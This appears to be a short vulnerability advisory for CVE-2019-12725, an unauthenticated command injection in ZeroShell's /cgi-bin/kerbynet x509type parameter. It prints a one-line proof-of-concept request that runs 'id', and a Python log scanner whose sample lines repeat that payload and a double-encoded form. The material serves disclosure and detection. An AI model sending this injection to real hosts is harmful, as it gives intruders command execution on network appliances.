ZeroShell 3.9.0 Remote Command Execution Vulnerability CVE-2019-12725
Vulnerability Description
ZeroShell 3.9.0 has a command execution vulnerability: the /cgi-bin/kerbynet page does not strictly filter the x509type parameter, which allows an attacker to execute arbitrary commands.
Vulnerability Impact
ZeroShell < 3.9.0
Network surveying and mapping
Vulnerability Reproduction
The login page is as follows
The verified PoC is:
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27
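For defenders, requests of this shape can be found in web access logs by decoding the x509type value and checking it against an allow-list. The following is an added example, not part of the original post or of ZeroShell: the combined-style log format, the allow-list pattern, the benign value "CA" and the sample log lines are all assumptions constructed for illustration, and only query-string parameters are inspected.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: Apache/nginx "combined"-style access log lines.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate x509type value is a short plain token.
SAFE_VALUE_RE = re.compile(r"[A-Za-z0-9_.-]{0,64}")

def suspicious_x509type(target):
    """Return the decoded x509type value if it is outside the allow-list, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/kerbynet"):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("x509type", []):
        # parse_qs decodes once; keep decoding (bounded) to catch double-encoding.
        for _ in range(3):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if not SAFE_VALUE_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (source address, decoded value) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        value = suspicious_x509type(match.group("target"))
        if value is not None:
            hits.append((match.group("src"), value))
    return hits

# Constructed sample log lines (documentation address range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/kerbynet?Action=x509view'
    '&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/kerbynet?Action=x509view'
    '&Section=NoAuthREQ&User=&x509type=CA HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/kerbynet?x509type=%2527%250Aid HTTP/1.1" 200 100',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for src, value in scan(SAMPLE_LOG):
        print(f"{src}: suspicious x509type {value!r}")
```

Any hit on a host that exposes /cgi-bin/kerbynet is worth triaging, since the flagged value contains characters a plain token would never need.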
This post is licensed under CC BY 4.0 by the author.